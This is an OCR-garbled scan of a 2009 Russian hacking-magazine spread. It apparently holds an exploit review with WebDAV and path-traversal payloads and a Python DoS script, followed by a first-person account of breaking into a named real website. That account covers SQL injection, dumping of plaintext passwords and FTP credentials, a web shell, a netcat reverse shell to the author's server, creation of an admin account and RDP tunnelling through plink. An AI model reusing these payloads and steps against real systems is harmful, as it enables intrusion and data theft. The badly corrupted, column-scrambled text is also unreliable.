</r) :propst<tlt>(](/O :response>O<O nSl)Qf'lЯ>Оф :href>/maГJU.tl </0 :hrеf>DФ :prоpsut>[]Ф :prop>Q
Ф:r~ourсе~><О :collec1ion/><IO :resooroEotype){](ID:prop>D<O :s1а1us>НТТР/1.1 200 01«/0 :staw:P l.J
</D:props1аtю</о :r"'e'sроRS1'>{]Ф ~I!')(]<O ~f>lindм<:.htmI<1D kеf>QФ :propsW>D-Ф :ргор>(] ....
Ф :resoc.rc!'typI!'/></() ;p-ор>D<О :$Utus:>НТТP 11.1 2DO ок </0 :S.t.1W$)[]<1'D :pYops~t>[)</O :rt'sponsE'>[]

i
~ 046 ХАКЕР 06 /126/ 09
08
ОБ300Р
ЭКСnЛОUТО8
ОБ~ОР
эксnлоuтов
» B3:AOIY1

I~

·~ИЗ 3. httpd.conf - файл описания опций WE8-сервера Apache [+ его проиэ­

· нозт IP:
· R"~ouru:
$,еn4 R~.,ues!. J водных).

Ш",. Namt:
· P"ss'W"ord:
*
Мetho41 РROPl"IIФ I J .
· . / .. / .. / .. / .. / , . / .. / . . 1 . . IProgram Files\i\.pache Group\
· Oestin,,'ion: Apache\conf\httpd.conf
· . / .. / .. / . . 1 . . / . . 1 . . / .. / .. /Ргоgrаш Files\Apache Group\
<?xml versIOfP"'.O" f1\Oodin9="uif-S" ?>
Apache2\conf\httpd.conf
t <propfind Xmlnf="OAY :") · ./ . . 1 . . / . . 1 .. / .. 1 . . / .. / .. /Prograrn Files\xampp\apache\
о(ргор>

~r.SOUl"o.typ./')
I conf\httpd.conf
ПРИМЕРЫДЛЯРАБОТЫ CWEBDAV МОЖНО НАЙ'ТИ,ЗДЕСЬ
(WEBDAV.ORG/GOLIATH/DAVEXAMPLE.HTMLJ 4.Логи доступа vo ошибок.

· .! .. / . . 1 . . / . . 1 . . / .. / . . 1 .. 1 . . /Ргоgгаш Files\!'.pache
2e%2e%2f - . . 1
Group\Apache\logs\access.log
%2е%2еl - . . 1
· . / .. / . . 1 . . / . . 1 . . / .. / .. / .. / .. /Prograrn Files\Apache
· .%2Е - .. 1
Group\Apache\logs\error.log
%2е%2е%5с - .. \

%cl%1c - 1 (иТР-8)
изБы
очныыйсписок путей конфигов и наиболее важных для неавториэи­
%сО%аЕ - \ (UTF-(3)
рованногопросмотрафайлов можно найти в подборке ettee 1~lпtiсhаt.гul
thread49775.htmlJ. В адваЙзори. которое было опубликованона mi(w()rm.
Некоторые ю представленныхвариантов платформозависимыи при­ ГО80РИЛОСЬо Метогу Соггuрtiоп по такой схеме:
годны далеко не на каждой системе.
import socket
Ф=tФm
Са ма эксплуатация состоит в посыл ке злонаме ренного GET -за проса: hos t = "127. О . О .1"
port = 8080
GET 1 .. 1 .. 1 .. 1, .1 . . /boot.il>i HTTPI1.1
User-Agent: Opera/9.64 (Windows NT 5.1; U; еп) try:
Presto/2.1.1 for i ;", гапgе(1,10):

Host: localhost: 80 # организуем десятикратное повторение заброса

Accept: text/html, application/xml;q=0.9, applicationl \,Е;В-сервера РОSТ-запросами с 60)'(ЬШИN буфером

хl"ltпй +хnй, irnage/png, irniще/jреg, irnage/gif, irnage/x­bu f f = "а" * 3 33 О

xbitrnap, *1*;q=0.1 request = "POST" +buff +" HTTP/l.O"
Accept-Language: еп-US,еп;q=0.9 connection = socket. socket (50cket .АР_INET,

Accept-Char5et: i50-8859-1, utf-8, utf-16, *;q=0.1 socket.SOCK_STREAМ)

Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=O conneccion.connect( (host, port))

Connection: Keep-Alive, ТЕ соппесtiоп.sепd(геquеst)

ТЕ: deflate, gzip, chunked, identity, trailers

except:
Ответ: ra",-input (' \n\nUnable to соnпесt. Press 'Епl:еr» to quit .... )

HTTPI1.1 200 ОК
Рассматривая проблеt-1у ближе, приведу детальный анализ. почему же
Sелтег: Zervi t О. 4
так получается.

Х-Роwегеd-Бу: сагЬопо Вот ИСХОДliИКИ:

Connection: close

Accept-Range5: bytes
Http.h,
Content-Type: application/octet-stream
69 struct http_data(
Сопtепt-Lепgth: 355
70 SOCKET sck;
71 char file[512];
[Ьооl: loaderJ 72 char keep_alive;
timeout=30 73 char даса [2048] ;
default=mul ti (О) disk (О) rdisk (О) partition (1) \WINDOWS 74 char usег_аgепt[512J;

[operating systenl5] 75 uпsigпеdlопgрtr;

mull:i (О) disk (О) rdisk (О) partition (1) \WINDO"/S= "Microsoft 76 );
Windows ХР ProfeS5ional" /NOEXECUTE=OPTIN IFASTJ)ETECT Http.c:
13 void parse_ht tp (struct ht'l:p_data *"'5g5)
Естественно. Bt-1еетО обращениS'l к Ьооt.IЩ t-10ГЛИ бы быть' 14
1. Конфигурационный файл хоетинг-панели Срапеl-/vаг/срапеU
cpanel.config. 21 if(stгсшр(сh,"GЕТ")==О)(

2. Файл настроек функционированияРНР - PHP\php.ini.

24 ch=geC_word(rnsgs) ;
· . / .. / .. / .. / .. / .. / .. / . . 1 . . /HINDOWS\php. ini 25 5trcpy(msgs->file,ch);
· . 1 .. / .. 1 .. 1 . , 1 .. 1 .. / .. 1 .. /WINNT \ php . in i
· .1 .. 1 .. 1 .. 1 .. i .. 1 .. 1 .. 1 . . lapache\php\php. ini Типичное использованиенебезопаснойфункции stгсруи буфера t-1алого
· .1 .. 1 .. 1 .. 1 .. 1 .. 1 . . / .. I .. /xarnpp\apache\bin\php.ini размера l Это все объясняеТ.I

ХАКЕР 06 /126/ 09
 » Е:3ЛОМ

~////л

Х MORO Х MUXX
I MORO@INBOX.RU I 1 MUXX@BK.,RU I

КЛАССИКА

ПРОНИКНОВЕНИЯ

ОТ ИНЪЕКЦИИ КАдминскаму ДОСТУПУ по RDP

Любой взлом преследует цель, которая определяет его ценность.

3адефейсить сайт для латентных любителей клубнички или поиметь
очередной рутовый шелл - решать тебе. Реалии таковы, что любая
уязвимость в web-приложении таитугрозу для сервера. И если ты не
ограничиваешься банальными и уже слегка поднадоевшими SQL­
инъекциS1МИ - статья длS1 тебя. На входе адрес жертвы, на выходе
админский доступ по ROP - классика проникновения l!

• ПРЕЛЮДИЯ, тихо и мирно. Итак, заветнаяфраза «iпsitе.ism Все оказалось настолькотривиально, что не воз­
ИЛИ КАК ВСЕ НАЧИНАЛОСЬ WS», кнопка Search и ... можно считать, что дело никало ни 1'ени сомнения в успешностидальней­

А начи налось все банально, Сначала был URL, сделано? шихдейст~ий Привычная сине-серая страница

Кому-то этот URL был почему-тоочень интересен.
и надо было гл~нуть, что С liИМ можно сделать.
URLсразупопалклису, который быстро выдал
результат: институтилитипатого,куча ссылок,
новости, меню и прочая лабуда. Мышь быст-
ро перескакивалапо ссылкам, и настроение
потихонькуподнимаЛОСI,.Мне всегда нравились
Порядка 10000 результатов oTGoogle обещали ошибки СоldFusiоп,представшаяперед глазами,
кропотливую работу. Лис быстро обзавелся открыла взору и полный SQL-запрос, и тип
вкладка~,и, в которые полетели вс~кие кав ычки, СУБД !SQL Sеrvег), и локальный адрес скрипта
равенства, дефисы и прочая нечисть. Вообще, информативность ошибок, выдаваемых
Cold Fusiоп, просто поражает - даже полн ый стек
ГЛАВА 1, вызовов. берv., не хочу. Инъекция найдена. пора
ИЛИ ВСЕ МЫ ГРЕШНЫ приступать к внедрению.

сайты с большим количест80мзна КО8 вопроса,
параметрамитипаid и числовыми значениями
влинкаХ ... Аздесьихбыло, прямо скажем, не
меньше, чем мусора на свалках,
Глянув на иконку любимого сканера и ухмыльнув­
шись, я решил все-таки ненапр~гатьадминов,
а обратиться к Великому Индексу и решить все
Практика показывает, что почти любой круп­
ный ресурс имеет инъекции Хоть маленькая,
незр~ча~ и фильтруемая инъекция, но есть
наверняка. Надо лишь присмотреться. Вот и
здесьзаветный плод был найден по адресу
h l tp :I!wwvo/. isrn .'ivs!Ap plica tiопs!Fогrns!
FогmОisрlау.сfm?Fогm I0-8464.
ГЛАВА 2,
ИЛИ ДА ЗДРАВСТВУЮТ
ОШИБИИ
Сервер БД он,елкомягкихвсегда поражал 803­
можност~~,и Я не говорю О стандартах,которые,
В общем-то,все разработчикиСУБДтрактуютпо­

~ 048 ХАКЕР 06/1261 09


. / _ . : : ......
-. . ~
разному Но парни из Mlcrosoft, вообще, каким-то
своим, HeaeДO'~ЫM путем идут. Мне, например,
нравится работать с SQLSeгver. Не надо ни коли­
чество колонок подбирать, ни ихтипы - ошибку
на преобразование вызвал, и в ответе вся инфор­
маЦИ51 из базы, как на блюдечке. Оченьудобноl
Сначала провер51ем возможность вывода.
http://'~.ism.ws/
Applications/Forms/FormDisp1ay.
вниз - получаем приемлемый пеЙджинг. Сервак
cfm?FormID=8464+or+l=(se1ect+@@
пощадим идобавим условия на проверку названий
version%2bchar (56) %2bdb_
полей - пусть они пароли какие-нибудьсодержат
name()%2bchar(58)%2bsyste:n_
Нуа для того, чтобы совсем круто было, определим
user%2bchar (S8 J %2Ь@@sег\геrпаше}-­
80тветполуцаем ошибку:
[Macrcmedia] [SQLServer JDBC Driver]
[SQT_Server] Syntax error convert iпg
the п·vаrс]-й.r valL\e 'Microsoft SQL
SеЛlеr 2000 - 8.00.2050 (Inte1 Х86)
Мат 7 2008 21:29:56 Copyright (с)
1988-2003 Иiсrоsоft Corporation
S tапdаrd Edi t i оп оп !,~ir.dows NT 5.
(!3'-li1б 2195: Servic<J Pack 4) :RDCMS­
ISM-Core: rms: IS1~SQLOl' to а со1uroш
о f data -суре int..
Имеем сервер не первой свежести и базу RDCMS­
ISM-Core. Внимательно присмотревшись.Я бук­
вально подпрыгнул от радости. аббревиатура CMS
явно да вала пон>пь, что сайтик не на коленках
сварганен, а целая большая и уважаемая контора
это чудо написала и бабла срубила. Но об этом
позже. А сейчас на очереди структура БД.
На ЭТОМ этапе мне детище Microsoft нравится
уже нетак сильно. Малотого, что разработчики
не удосужилисьсделатьнормальныйпейджинг
результатов,так еще и гоw_пumЬегв 2000 сер­
вере реализовать неуспели. Ждет liасжесткая
эротическая прогулка с использованием топовой
конструкции. ТОР - этотакая фишка, которая
позволяет получить первые несколько записей
позапросу. А воте какой записи начинать. указать
ХАКЕР 06/126/09
".
» 6::лоtv1
._,. __
~ [)oo:t,<4 ~IJ. ~I, ~'_T .. IJ'~.
С Х w 1:~IIt~;,i~:Ш;;:;~~}~'JOIIII:,~i-~~:.~ .ji.;~ :0"
~c_мn.~ ","-1~ .~f_~", ~
r:\дc,пaaW'!tl~!mI!II !> 5I!tIS<.o:\· . ' : . ~' '$I!II'&O: z:: . .". wt't::!':I. SC,"""Sl:r;, ,,!:!ot.
e()мb~' ~,"'*'t~'.:зQ5'~F",,,,, ~П~'i131'fо3'rI:~- ..;.."""~- /CA ·~;RНC!I· /ioai!·[I ....... s.u"'·
Tne web site you аге accessing has experienced an unexpected еггог.
;:
Please contact the webslte administrator.
'М,;!!,,,;;';.';
Щ4'Щ·§.$М§d5Ч #W!фU&'
'4"';; '&
1F.)тor Executinq Dabtbase Query.
ZE&~~.~§~-~':':#4!"!!!,,,!';!'i!'!!:::LJ:::::::.i8l1iiiiiiiliillliillili1!Ei!щ
fI14tr.",~.;T.XSQI.S."",'IOII(;O"""J(SQl.S."""<1tinl~;Z:[~00I'I'~e:t:H"''''~n'~' ...". 00-" \)0,0. '"".- _ ""'- ~
on'\p"bI( ~~~ ~ :::=":I.. ~~::--''''''''~!!.:.!:'.~''''''~~Ъ;;оо!l'&'Iq -1~-=­
1:'~\~':"'1'~;~:y~~;:'~II~~e:su.b\IIDC9mm9P\tm5~o"'\'''''I;.,ti )( ...
.Е
~~:::::::~~~~::~~~:=:~~::::~:~~::~:~~:~:::::~:~o ".><~-_ ....... ; SL»t ....._ . . . . . - ~_I' ~~-
ClIlred INlm O;\lnc\il'ltl\llOCgmmon\crмa:(e\;'DDIic,aoons'lDublJcVom'Is·'O"If~ o ...>tIO· э .._· .,;t ..... :':I_ ... L_' 010"1''''''-'' _ _ о ,1... ·
~::::~
51 :
:;::: ~;~~:~~::::::::::=~~:::~:~~~:::~:~:~:.
III1.С"Е Т'. TeIOP1,,~e7Ypoe • 'ro,,,,'
The web slte you аге acremng has Qxperlenced ап unexpeeted error.
PleaSQ contat;t the websitli1i admiltlstrator.
и : ,,'--- »tD db" __ 1Vi~Y('$~~:;
~. • AIID R.t:nl1t.rl'1l _ .ro........
. , ' '! ' • ( ... , "' J ~ ). • ,
5.5 : OiUl~R В! R.Reso"'t<:eWo.-:о:
5б ~ ,,/ e.tq\le ,у> (m;.ro.»rre~,·ihI"'~]F:·~.~
~LfСТf\.·.Т.·,F.·,'Нf,l.к_
••• Нs.dеrl'.u..РТ2.f,:е
'п.SttOJO.Н2.s"otеJO.51-11.СfМо~рi"'iТоlndud
•••• Н ••d.
~~go~:~iт:~:I~~.~e~:s~~:::~~
~.:;'~~~:i·RR] :;\.': ~~,~~.~Т;:.~,--:\....--. .._,..........\ •• oII, .....,,'\... btI'\'О<1'n­
'ОС
T.En\ittID_f.fnti!yIOlotIJOINPТ.Pro.eMoOti."Terтu>I
.....
PТ1.En~. . yIDlef'l:)QIt.lPТ_'~.cnt.,;onTemplЫosPiZenffo
' loIl.... "" О,\I .........яОС_.......-.--...~
e.1Io4"'-о,~.".r.c-.мo..........,.~.,.~
1.ltюln5м..$~.<sI'41OfIl'n.s~"lo_ SI'\1.S;~1D"NO 5" :~:::-.:::::~=::=:::::::==;~;=::=:~i~
'"."d<lC!ion·lef'tJOII-IS,",-S«s5М20nРТ2",>,,-оID .. SМi.S· ~;";.",,,,o'~~':"'f~':-:._\f"~'4"'''''''
__ \f~I.6n'w~r
.. _OV~r"""''"'
l
;i~~';~E~f T.Templbt"Тype ~ "0''''' ANOII,.E<М1 :~: :,:;-;.:~.:-;.;,:'f~·;:::::....,........,..•. t.Ш'1S~~.R.1' ... ",JDJ ~ 1
Io.aT"SOOR.CE
V~NOORf:RII.ORt:OO~ 1;'\1 )~ , .:041"'" ., , ... I••((~­
__ .,
SQL.SТ"тt I<Y<.IOO
l'I..o ..... ~,
..
bl'I.LCTl.·.'.-.'.·.fnJ ,.. " ОТ: .• :Iof< ott,
~~:~~~';:i:~:~.t;=':.:~.:..:.>(~>o, ..
..
сl'l.~'m.O'I.I~ tfЖl~,II)-I.tw:oto~»1Nt1';J_
......
.
fl_II't_._"'_ ш."~ Т_ I... _'~""_
..
~!1 OOI'!ooQ'otIJUL.w·_ ' _ _ ""'DI_~lr ....
'~'I"_"'1~<'"I<\ ...
IoIIJoI1lC>'L&iooff.tIJ_~.~ID_·
•._(......
........ .$eo(O~~.~t"._
·"'.·.,t-..._ .... )I):'f$IO.$>In~or:,rn.3.МIО·:I"'l.~I,,_$"!~t ....
~·.II!.~'.'_.t;Н-l'_·aJ<tIl.t~"' ..
fT'OII ... __ .......-(, .... .... _ .. j·."................ II.""
""".-.о,
_er
ИНЪЕКЦИЯ :~':"'~~:;;;_=-:::1~-:::.;.;:'J:.':!.~~
. .". .,. "".. . .
НАЙДЕНА!
~~~~cO)O(! ~~F·=::.· _t) ••• ~ . .,..,• •~ • •• ""......_ .
невозможно, что вусловиях нашего нереаль­ сайтразработчиков, а сама CMS, оказалось,
ного взлома ну совсем никак не удобно. Можно, носит гордое название Results Dlrect. Зачем в
конечно. пойти стандартным путем: получать по базе хранить учетные данные, я так и не догнал,
одной записи, запоминать и яв но исключать из но к Itp они реально подходили. Аучетная запись
следующих запросов. Но м не этот метод совсем с и менем ism ws prod code и вовсе на вевала
не В кайф' и автоматизации трудно поддается, радужные мысли, которые. к слову, быстро
да и длина URL не резиновая - для больших баз подтвердились Корень FТРбылоченьпохожна
накроет нас медным тазом корень самого саЙта. После тестирования доступ­
Поэтому мы всех обмане,~ Сортируем вверх и НОCl'и нескол ьких скриптов факт отображения
папок и файлов был окончательноустано[3лен.
Доступ по FТРоткрывал широчайшие перспек­
ТИ8Ы по залив ке фа йлов на сервер и избавлял от,
казалось, неминуемых приключений по раскопке
для начала их количество iпримеры запросов функционала админки и поиска ВОЗМОЖI~остей
смотри во врезкеJ. Воттаквот-их9 Поехали l получения шелла.
Сразубросилась в глаза табличка Е5_Lоg'lпlпfо
[RDCMS-ISM-Core: dbo' ЕS_Lоglпlпfо. ГЛАВА 4. _
Password] В общем-то, ,~ожно поти рать руки и ИЛИ ХОЛОДНЫИ СПЛАВ
заказывать пиццу, но не тут-то было. Определив Что делать с FТР,полагаю, вопросов ни у кого
струК'турутаблицы, я получил следующую картину. не вызывает. На ум сразу приходитобеспечить
Втаблице присутствовалотриинтересных поля выполнение команд на серваке и выбрать-
EntltylD, Usегпаmе и Password Думаю, объяснять ся, наконец, на свобод)' из душных объятий
не надо, что я быстро составил новую сери ю web-приложения. Очевидно, нужен веб-shеll,
О запросов и моим глазам предсталиданные юзве­ который позволит бродить по серверу и выпол­
рей. Пароли хранились В открытом виде и можно нять команды, Но вот беда - никакихследов
было сло,~я голову кидаться на сайт в поисках РНР или, на худой конец, Регl обнаружено
заветной админки. Я, кстати, когда добрался до не было Азначит, момент истины наступил:
исходников, долго и тупо втыкал, поче,~у нельзя придется программить на СоldFuslOП Очень
было шифровать пароли, если парни-разработ­ гибкая и простая в освоении среда [по словам
чики CMS это предусмотрели [SHA-l, SHA-512, разработчиков). но мне почему-то ни разу не
МD51 и даже реализовали собственный алгоритм нравится. Так что, ГУГЛI1М на temyWeb-shеll'ов
[iMISJ. Ну даладно, Я залогинился, пошарил по и дико облам ывае,~ся. Все ссылки приводят
сайту и вернулся кда мпу структуры БД - еще же в К одному И тому же невзрачному кусочку кода,
8та5лицах были поля с паролями. который только ко,ынды исполнять и y,~eeT. Ну
даладно. сейчас подточим и подпишем, нужно
ГЛАВАз. лишь матчасть поднять. Некоторое время ушло
ИЛИ ДОСТУП ОТКРЫТ на нереально крутую разработку, после чего
Следующей привлекла В~lи,~аниетаблица SM_ на свет появились два отпрыска. Первый нас
Sites, содержащая колонкус незамысловатым водитпо дирам и файлы показывает, второй
названием FТРРаsswогd.Какоказалось,таблица нас слушает и делает, что мы при каже м.
содержала 'гакже колонки FTPUserName и Файлы быстро за~IЯЛИ свое законное место. Вско,
FТРSегvег. Слив данные из таблицы,я увидел, что ре я понял, что владею правами учетки SYSTEM,
в качестве серверов использовалисьflQTd.net а это было нереально круто. Останавлиааться на
и ftр2лJле\ По адресу гdлеt как раз и хостится достигнутом было нельзя
 » 83ЛОМ

.•
"~~,'~.).-с.,,,с~,~~,,!,.а ,~~.!kW;.~ ..- - - - - - - - - - - - - - - - - - - - -
..
<M~""; WI;.-а·".'.".'t.".'_I~'
<.IC[C~<::~!"'~ "'Callc •. H.;.< ......... ".~ ..r .... (cI· - ~ ...~:.r.'cr.b~<~.I..·.. k<I"".·~I~t)

... ~" ..... ·v.L"".-rIl;),_Н%.t..... ~·~

..... сж".. . .~!>С~ "C.II:'O•• Ht«II>.""c~ _I",:"",' • r.",,::>(1'" '1>"' 1,'••"'" '~IU"1!"Ji

-
<1_ •• ~ •• V~OJ>".'''''1' •• '1 t .... .юn< ~~."4 bLL. _~

C~Ц~:,;;.~~~~;;~~-;;. ;;~~::~~~~~;.:.;:;:;;;~~:~::::;:~~~~~~~;:' ~~?~:;fo~~.~~~:~'".H.,~_

..

'''' ..1;:10О10.1>

I"cot.DIz:mIIl-....:I

~ .
КОРЕНЬFТРОЧЕНЬНАПОМИНАЕТКОРЕНЬСАМОГО ПОЧЕМУ НЕ ШИФРОВАЛИСЬ ПАРОЛИ
САЙТА ОСТАЛОСЬ ЗАГАДКОЙ

ГЛАВА 5, у порт3389, и глаза мои радостно заблестели. В шелл посыпаЛlКЬ очень

ИЛИ ЧЕРНЫИ БРАТ важные и нужные команды.

Web-st1ell- это, конечно, здорово, но вовсе нетакудобl1О,как может

показаться.Надо брать быка за рога и получать нормальнуюконсоль. Tolal net user st раssvюrd !add

послуwнозабросилпеlсаt на FTP. На дедике был запущен пеtсаt в режиме net localgroup Аdrпiпistrасоrs st !add

прослушивания: «пс.ехе -l-p 1234». На зарядку 8 шелле поставлена

кома нда «cmd /с п с.ехе mOrOsuperdedlk.com 1234 -е cmd". Выстрел сделан
- шелл в консоли I Пошарив по файловой системе и запустив сдесяток
интересныхутилиток, я принял решение, что Винда без окон - этоэло. В
99-м году монады еще не появились. ставить что-то было западло, а рулить
серваком почему-то было вообще никак не удобно Netstat ГlOказал живой
Запуск mstsc, тем не менее, жестко обламывал, выдавая сообщение о недо­
ступности хоста. N МАР обламывал еще больше, так ка к открытыми оказались
только во и 25 порты Видимо, хостбыл защищен фае ром и порт3389триви­
ально блокировался. Сдаваться не хотелось, поэтому был быстро составлен
перечень возможных способов получения графического интерфейса:

\mс;

РРТР;

Как жt? y(:TpOUT5:

SSiJ.

п_t?ugжuнг?

ГЛАВА 6, ИЛИ ПРИВЕТ, ОКОШ,КИ

Получитьвсе данные из БД за один запрос - мечта любого хакера.
Но жизнь диктует свои условия и. как правило, взломщик вынужден
выуживать и нформаци ю строчка за строч кой. Н О вот беда, разработ­
чики СУБД решили ситуацию усугубить, причем каждый по-своему
Итак, о схемах пейджинга данных.
Основная проблема заключалась в организации обратного коннекта на
нашдедик. Оп ыт С пеtсаl ясно давал понять, что порты блоки руются только
на входящие соединения, поэтому организация обратного коннекта от
ка кой -нибудь графической системы управления наверняка дала бы

1. MySOL. П редлагае, конструкци Ю limit !offset, ] гоwсоuпt. В ыби ра ем

гоwсоuпt [в нашем случае \! строк, начиная со строки offsel Гениаль­
но, просто молодцы l
РУ';НОЕ' \·'8 aBTO!'.·1-'tТU';t?СКОо?
2. Oracle. Используем псевдостолбец ГОWПLJm Проблема в том, что
rOWnLJm генерируется автоматически, и 'iельзя, к примеру, выста­ Поискуязвимостей на сайте, в целом, сводится кдвум пунктам.
вить условие типа гоwnшп=n. Такой запрос вернет пустой результоп • инвентаризация СКРИГIТОВ и их параметров,

Без подзапросов здесь не обойтись: select. fieldname frош

• фаззинг принимаемых от пользователя данных.

(select а. fieldname, rОWnШIl r from (select. f:Leldname

Решение этих задач, 8 принципе, поддается автоматизации, но на

frош tаЫепа.ше) as а ,.here r=<offset»

поверку оказывается, что единственным стоящим сканером явля­

3. SOL Server 2005 Здесь все по стандарту используем row_ еТС9- Ассuпеtiх. Все остальные, в том числе и всюду распиаренный

ПLJmЬег11 Например: selecc fleldl, field2 from (select X5plder, работают крайне медленно и ПРОl1ускаютогромное коли­
rШ'1_пumЬег() over (orderbya.fieldl) asr, a.fieldl, чество инъекций Кроме того, любой сканер серьезно напрягает
а. field2 fгош (select fieldl, field2 fгош саЫепате) сайт, выдавая хакера с потрохами.
as а) as ь ~.here r=<offseC>. Зачем же пол ьзоваться ска нера ми, есл и бол ьшую часть ра боты за
4. SQL Server 2000 А вот здесь все жестко у нас есть только тор. нас уже сделали ребята из Google. Предоставляя rибкие праВИi1а
Для пейджинга применим такую хитрость' если нам нужно 'Зыбрать создания запрОСО8, Google позволяет получить структуру сайта на
запись С ыомером offset, мы сначала выберем тор <offse\> записей с основе своего индекса, а уж наличие инъекций быстро проверяется
восходящей сортировкой, а уже из полученного результата выберем вручную Тихо и незаметно. А вот если ничего найти не удалось,
первую запись с нисходящей В результате последняя строка станет можно прибегнуть и к сканеру. Только мы советуем не пользовать­
первой и ... дело сделано Только ПОМI,И, дЛЯ получения корректного СЯ платными решениями для ламе ров, а написать собственного
результата сортировать нужно по всем полям в запросе l маленького многопоточного зверька.

,~ 050 ХАКЕР 06/126/09

 » ВЕ:лоtv1

ё (' Коr1андная строка - "C:\Documents and Sеttln9s\саdШlп\Рабочии етол\пс.ехе·· ·I-p 1234

рулим СЕРВЕРОМ ПО RDP - ЦЕЛЬДОСТИГНУТА

возможность рулить серваком. Естественно, выбор пал на ный файл rasphone.pbk на взломанныйхаст. Затем созда·
VNC. Схема внедрения VN С, в целом, достаточно проста Iдля ем командный файл следующегосодержания:
ТightVNC, напримерl:
rasdial connect iоп_паше user раssиогд

1. На сервак заливаются I-Jinvnc. ехе и Wl1l_hooks. route add 0.0.0.0 mask 0.0.0.0

d11. remotehostgateway

2. Устанавливается и запускается V'NC-сервер.

wiпvпс. ехе - ins taJ.1

Вторая строчка liужнадля восстановлениямаршрута поумол­ На нашем дv.скетебя

пеё еёатё "VNC Ser·vp.r"

чанию после подключения,чтобы наш дедик не взял на себя ждут и сходн И ки n ро­
З. На дедике запускается КЛИ"'Н'Г в реЖVlие про­
все обязательствапо маршрутизациv.трафика.Запускае~ стогоwеЬ-shеtt'а для

СJ1ушивания. батн и к и выпадаем в осадок J Соединения "ам не видать, как сайтов подуправле­

4. Осуществляетсяреверс-коннект..
СВОИХУLUей, видимо. фаер блокирует исходящие соединения нием CoLdFusion.
wiпvпс. ехе -соппесt <host>: <port>.
на основе типа протокола В черный список попал и наш GRE­
трафик
у нас почти все схвачено, кроме одной маленькойдетали. а Отчаяние все сильнее проникало в наши души, но мы не
именно - наличия доступа к рабочему столу. Надежда уми­ сдались. По правде, тупили мы очень долго, таккак надо было
рала, едва успев родиться, тек как шелл у нас был справами сразу обращаться за помощью к 55Н Это. кстати, очень мощ­
учетной записи 5У5ТЕМ. Не были бы мы хакерами, если Hый зверь, о чем не раз писалось в::х:. Не только шелл можно

бы не попробовали, но, каки ожидал ось, все попытки шли получ ить, НО И много других хитрых вещей придумать. Наша
лесом. Был даже испробован Metaspl.oit cwindows/vncinject/ последняя надежда заключалась F! успешной реализации
reverse_tcp нагрузкой Iжуткотормозная вещьi, но и Великий всеготрех шагов:

Фреймворк не помог. Принци п внедрения VNC на се рвер Для автоматизации

посредством неинтера кти вного шелла и В условиях отсутствия заrtУСТИТЬ на дедvпсе SSH-сервер поиска уязвимостей

доступа к рабочему столу остался неведом На самом деле, я залить на узел SSН-кпиент можешь воспользо­

даже обрадовался -зачем HaMVNC, если есть RDP. Надо толь­ подкш,читься и создать нужный маппинг портов ваться следующими

ко прабиться через фаер. продуктами:

Гениальная мысль с РРТР заключается в создании я многое могу пон!пь. но, например, поче~у в Винде в • асuпеtiх.СОГП/
РРТР-соединения до нашего дедика - и в дальнейшем XXI веке до си х пор нет встрое н н О го 55 Н-сер вера, м н е \/u lnec.a_b.ili1.y.-scan пег/
обращении к узлу по внутренней адресации с туннели· неведомо. Ну да ладно, ставим любой, благо их довольно - Ассuпеtiх WеЬ

рованием трафика сквозь фаер. В Винде все соединения много. В качестве клиента, естественно. используется vuLпегаы
ltуy 5саппег.

настраиваютс\\ графически, но должен быть способ работы
из консоли. Запускаем на тестовой машине ргосгпоп от
Руссиновича и мониторим реестр в момент вызова клиента
подключения к сети. Результат не поддается разумному
обьяснению, - ничего интересного с реестром не проис·
ходит. MicrosoFt сама себя превзошла. Стоило создавать
реестр, если собственные же модули им не пользуются,
Пусть подумают на досуге, а мы, тем временем, нашли
«телефонную кни гу» ПО адресу С:\Оосuгпепts апd 5etti пgs\
любимый putty. Нотолько putty не простой, а волшебный. • ptsecurity,l'u/xs 7.asp
Если помнишь, при обращении к новому узлу рuttучестно - Xspider.
предлагаетсохранитьсигнатуру в кзше. Доступ К команд­ • cirt,net/nikt.02­
ной строке у нас Иlперактивностьюне отличается, и ничего Nikto.
мы
ответить на ЭТОТ вопрос попросту не сможем. Значит, • ;;еПlliоs t .СОГП/
надо, чтобы отпечаток сохранялся автоматически,а putty research/v,ikto ­
этого не умеет. Немного погуглие, мы нашли Quest РиТТУ Wikto.
О.60_цl.129. Все то же самое, плюс то, что нам нужно'
Заливаем plink.exe на cep~aK и исполняем команду:

АН Users\Appli саtioП Oata\Mi cГ'Osoft\Network\Con nections\

Pbk\rasphone.pbk, в которой, собственно, и описываются pJ.ink.exe -nс mOrOsuperdedik.com:22 -oatcl1
параметры подключения к Oial·up и VРN-сетям. Создае~~ -р"', password -R 3390: 127. О. 0.1: 3389 -L
подключение К дедику [с уста новленной И настроенной 3390: 127. О. 0.1: 3390 -1 st -аutо_stоrе_kеу_iп_

службой RRA5] на тестовой машине и копируем получан­ cache mOrOsuperdedik

ХАКЕР 0& 11261 09 ~ 051

 » В3ЛОМ

~'"';Win55HD 5.05 Control Panel ~ОО13

Sessions Sertd щ; feedback...

5erver

Sessions overview
The following sessions ауе currently active оп WinS5HD. Click[+] to expand а sessitln and see the 5SH channeJs it is using.

­
Sessions: 1 Blocked IPs: О View bIocked IPs...
I Remote Ip Remote port Connect time Client version Account type
Id
в 1001 204.153.45.116 1318 00:07:32 5SH-2.0·РuТРо'_... \/·ШJDО\oIJS
:.. ,. Open time: 00:07:N, Туре: forwarded-tcpip, Буtеs received: 2 760148, Bytes sent: 21 202
:.... Open tIme: 00:07:29, Туре: direcHcpip) Буtеs received: О, Буtеs sent: 287

ФАЕР ПОБЕЖДЕН - КАНАЛ ПОЛУЧЕН

~O--"' __ , , " _ ~ .
•
:1)(о.о,с . с' Х .... ,tj,,,-,,"--'-J~~_,'-f-"';OIIfLoOO: ~ !d­ _
• _ _• __
<form action=" ht ер: / /www. ism. ,vs/about/
*"' ~ I'#lk.. • • ;""1..,.. 0 - ' _ _.,.,..
Q_·t.CooO_·~CI~·C;_· .>_-0_." 4_'. Q.._·::--/... ·0-....... · t1еdiаRООШ/RеqllеstГоrm.
cfm» method=" POST" >
Tne web slte you 3ГЕ! acces::sing has expenenr..ed аn unю;~~ttЮ e:rror.
<table>
PIe8:S'e; contact Фе website adminlstтator.
. , , "'. < tr><td>IP-адрес уэла для туннелироаания: </
E/I"OI~е-::.~'N·~r-:-.~'":Y,IР"4>О:;t
td><td><input type="text" size="20" name="ip"
~ info "al ие= "mOrOsuperdedik. сош'»</ input></ td></t:r>
Получение инфы из <tr><td>Порт SSH:</td><td><input type="text"
БД вручную -утоми­ size="20" паmе="роrt." vаluе="22"></iпрut></

тельный и небла­ td></tr>

